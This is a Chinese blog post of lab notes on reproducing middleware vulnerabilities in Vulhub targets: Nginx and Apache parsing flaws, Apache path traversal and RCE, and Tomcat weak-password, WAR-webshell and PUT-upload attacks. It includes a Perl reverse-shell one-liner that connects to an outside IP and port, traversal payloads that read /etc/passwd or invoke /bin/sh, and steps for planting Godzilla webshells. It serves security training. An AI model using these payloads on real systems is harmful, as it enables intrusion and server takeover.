第59天:服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx

最新推荐文章于 2024-09-06 09:50:30 发布
最新推荐文章于 2024-09-06 09:50:30 发布
阅读量1.1k 收藏 13
点赞数 35
文章标签: 中间件 安全 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71529930/article/details/137673187
版权

目录

思维导图

中间件以及框架列表:

案例一:中间件-Nginx-文件解析&命令执行等

配置不当造成的解析漏洞

 文件名逻辑漏洞

案例二: 中间件-Apache-RCE&目录遍历&文件解析等

Apache-RCE

目录穿越漏洞

文件解析

案例三:中间件-Tomcat-弱口令&文件上传&文件包含等

弱口令

文件上传

文件包含

思维导图

中间件以及框架列表:

IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere,Jenkins,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery

案例一:中间件-Nginx-文件解析&命令执行等

nginx解析漏洞:

配置不当造成的解析漏洞

靶场环境:Vulhub - Docker-Compose file for vulnerability environment

上传图片时抓包

发送到repeater,文章末尾加入,php代码,右侧可以看到上传路径访问图片

 加上/1.php

 文件名逻辑漏洞

靶场:Vulhub - Docker-Compose file for vulnerability environment

留一个空格

加入脚本

重新抓包访问,留两个空格加上.php

hex 0x20 0x00.php

成功返回php

案例二: 中间件-Apache-RCE&目录遍历&文件解析等

Apache-RCE

靶场环境:Vulhub - Docker-Compose file for vulnerability environment

访问路径:

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

反弹shell的脚本

echo;perl -e 'use Socket;$i="47.94.236.117";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

访问抓包

开启监听

运行成功反弹shell

目录穿越漏洞

前提条件:

  • 版本等于2.4.49
  • 穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>。(默认情况下是不允许的)

可以帮助看到web目录外,别的系统配置文件

靶场环境:https://vulhub.org/#/environments/httpd/CVE-2021-41773/

利用icon目录必须是一个真实存在的目录,%2e为 "."

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

 如果cgi和cgid模块被设置了,那么可以进行命令执行

/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

文件解析

利用条件:

1.黑名单验证,不能上传 php

2.能够上传

靶场环境:  https://vulhub.org/#/environments/httpd/CVE-2017-15715/

上传php文件,会显示不能上传

上传的时候抓包

发送到repeater修改

 把空格改为%0a

成功访问

案例三:中间件-Tomcat-弱口令&文件上传&文件包含等

弱口令

tomcat通过爆破弱口令能够进入后台终端,取得webshell权限

靶场环境:https://vulhub.org/#/environments/tomcat/tomcat8/

加上默认地址  /manager/html

登录抓包:

该数据为账号:密码的base64位编码

发送到intruder爆破,添加变量

设置字典

 成功暴力破解

文件上传

补充知识点:

war文件是一种web应用程序格式,包含了一个项目中所有源码的集合并按一定的目录结构组织,由于将所有文件合并成一个文件,因此节省了文件的传输时间。可以将其放在tomcat下的webapps目录中打开并运行

找一个jsp编写的大马,把他压缩为war后缀的。

上传jshell文件

这里大马的账号密码为

访问大马  根目录/jshell/jshell.jsp

功能截图

哥斯拉下载地址:Release v4.0.1-godzilla · BeichenDream/Godzilla · GitHub

从网上下载哥斯拉

 运行

生成木马

 压缩为war后缀

访问页面为空白

用哥斯拉连接

添加后执行

CVE-2017-12615,可以采用put形式进行上传

靶场: https://vulhub.org/#/environments/tomcat/CVE-2017-12615/

搭建起来以后,抓包,put方式上传

 哥斯拉测试连接

文件包含

漏洞利用工具:GitHub - sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read: Tomcat的文件包含及文件读取漏洞利用POC

执行该脚本如果有返回值说明有漏洞

xiaojiesec
关注
  • 35
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
服务攻防-中间件安全&CVE 复现&Apache&Tomcat&Nginx
m0_61506558的博客
12-16 638
IIS逐渐被淘汰,本篇文章主要介绍Apache&Tomcat&Nginx中间件出现的漏洞,如图 0-1所示为中间件解析报出的漏洞。(一)Nginx-文件解析&命令执行。
服务攻防-中间件安全&CVE 复现&Weblogic&Jenkins&GlassFish
m0_61506558的博客
12-19 556
(一)中间件-Weblogic安全(一)中间件-Weblogic安全探针默认端口:7001,Weblogic是Oracle公司推出的J2EE应用服务器,检测工具,如下github链接2.cve_2018_2893 工具3.cve_2018_3245 工具4.cve_2020_14882 工具。
小迪安全59 服务攻防-中间件安全&CVE 复现&IIS&Apache&Tomcat&Nginx
qq_44005305的博客
04-17 684
进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。目录外的其他文件,如系统配置文件、网 站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。找到文件上传点,上传jsp的后门代码,压缩为zip后改名后缀war再上传!修改抓包内容,用POST提交,下面的是使用棱角社区生成的perl的反弹shell命令。历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。这个跟文件上传类似,找到文件上传点,上传png图片。
服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现
Karka_的博客
06-22 666
ISS中间件(Internet Security and Acceleration ServerMiddleware)是微软公司推出的一种安全中间件,旨在提供高效的安全代理服务和网络加速功能。它是Microsoft ProxyServer和Microsoft Firewall产品的继承者,也是Microsoft Forefront TMG(Threat ManagementGateway)的前身。
59-服务攻防-中间件安全&CVE 复现&IIS&Apache&Tomcat&Nginx
weixin_52529261的博客
02-07 966
本文章涉及ApacheTomcatNginx中间件重要的CVE漏洞复现
网络安全全栈培训笔记(60-服务攻防-中间件安全&CVE复现&Weblogic&Jenkins&GlassFish)
qq_46343633的博客
02-02 1462
1、中间件-Weblogic安全2、中间件JB00S安全3、中间件-Jenkins:安全4、中间件-GlassFish安全
服务攻防-中间件安全&CVE 复现&K8s&Docker&Jetty&Websphere
m0_61506558的博客
12-20 732
Docker容器是使用沙盒机制,是单独的系统,理论上是很安全的,通过利用某种手段,再结合执行POC或EXP,就可以返回一个宿主机的高权限Shell,并拿到宿主机的root权限,可以直接操作宿主机文件。它从容器中逃了出来,因此我们形象的称为Docker逃逸漏洞
中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现
rumil的博客
10-20 1922
服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现 1、中间件-IIS-短文件&解析&蓝屏等 2、中间件-Nginx-文件解析&命令执行等 3、中间件-Apache-RCE&目录遍历&文件解析等 4、中间件-Tomcat-弱口令&文件上传&文件包含等 漏洞复现
网络安全全栈培训笔记(59-服务攻防-中间件安全&CVE复现&lS&Apache&Tomcata&Nginx
qq_46343633的博客
01-30 1472
中间件及框架列表:1、中间件-IIS短文件&解析&蓝屏等2、中间件-Nginx-文件解析&命令执行等3、中间件-Apache-RCE&目录遍历&文件解析等4、中间件-Tomcat-弱口令&文件上传&文件包含等。
服务安全-中间件-Apache&Tomcat&Nginx
m0_65336233的博客
11-09 1302
简单讲解中间价-Apache&Tomcat&Nginx漏洞
IIS中间件
Valder__的博客
09-03 175
动态内容,则是先将请求传递给后端处理器,处理器生成动态页面并返回给IIS,再将其发送给客户端。是一个灵活、安全、可扩展的Web服务器,支持HTTP、HTTPS、FTP等多种互联网协议。数据访问:提供统一的数据访问接口,简化数据库或其他存储数据的访问。中间件是一类软件,为应用程序、服务和组件提供一个通用的服务层。通信:提供通信框架,帮助不同系统与应用之间进行数据交换和通信。他还管理与应用池的通信,这些应用池处理请求并响应。安全服务:提供认证、授权、加密等安全策略。可以授权检查,确保用户有权访问特定的资源。
Node.js 入门:中间件安全性深度解析
最新发布
weixin_52392194的博客
09-06 669
在用户注册和登录的过程中,除了基本的用户名和密码验证外,还可以结合 JWT 的生成与验证来确保用户的身份认证。在实际应用中,结合 JWT 和用户角色管理,可以有效地实现权限管理,确保不同角色的用户只能访问各自的资源。通过上面的代码,可以创建一个使用 HTTPS 的 Node.js 服务器,从而确保所有的数据传输都是加密的。通过上面的全局错误处理中间件,可以捕获应用中的所有错误,并返回一个统一的错误响应。等库,可以对用户输入进行严格的消毒,移除其中的任何 HTML 标签和脚本,确保输入内容是安全的。
阿里中间件——diamond
FeelTouch Labs
09-06 594
获取的地址列表,会保存在client本地,当出现网络异常,无法从网络获取地址列表时,client会使用本地保存的地址列表。c. diamond服务端是一个集群,集群中的每台机器连接同一个mysql,集群之间的数据同步通过两种方式进行,一是每台server定时去mysql dump数据到本地文件,二是某一台server接收发布数据请求,在更新完mysql和本机的本地文件后,发送一个HTTP请求(通知)到集群中的其他几台server,其他server收到通知,去mysql中将刚刚更新的数据dump到本地文件。
Linux——中间件、数据库(理论)
Xinan_____的博客
09-02 1268
3、为维护索引付出的代价大:为了提供丰富的查询能力,通常热点表都会有多个二级索引,一旦有了二级索引,数据的新增必然伴随着所有二级索引的新增,数据的更新也必然伴随着所有二级索引的更新,这不可避免地降低了关系型数据库的读写能力,且索引越多读写能力越差。5、全文搜索功能弱:例如 like “% 新年快乐 %”,只能搜索到 “新年快乐,爱大家”,无法搜索到 “新年真是太快乐了,爱大家” 这样的文本,即不具备分词能力,且 like 查询在 “% 新年快乐” 这样的搜索条件下,无法命中索引,将会导致查询效率大大降低。
【盖世汽车-注册安全分析报告】
09-02 1341
盖世汽车(上海盖世网络技术有限公司)是汽车产业专业的信息服务平台,为企业及行业人士提供一站式服务
【一嗨租车-注册安全分析报告-滑动验证加载不正常导致安全隐患】
09-02 1201
一嗨租车创立于2006年1月,主要为个人和政企用户提供综合汽车出行服务,一嗨租车于北京时间2014年11月18日晚9点45分,正式登陆美国纽交所挂牌交易, 作为美股上市公司,拥有雄厚的技术实力,但采用的是通俗的滑动验证产品,并且不能正常加载导致安全隐患。即使问题解决,其安全性在机器学习的今, 已经无法应对攻击了,并且正是由于该产品通俗, 所以在网上破解的文章和教学视频也是大量存在,并且经过验证滑动产品很容易被破解, 所以除了滑动验证方式, 花样百出的产品层出不穷,但本质就是牺牲用户体验来提高安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值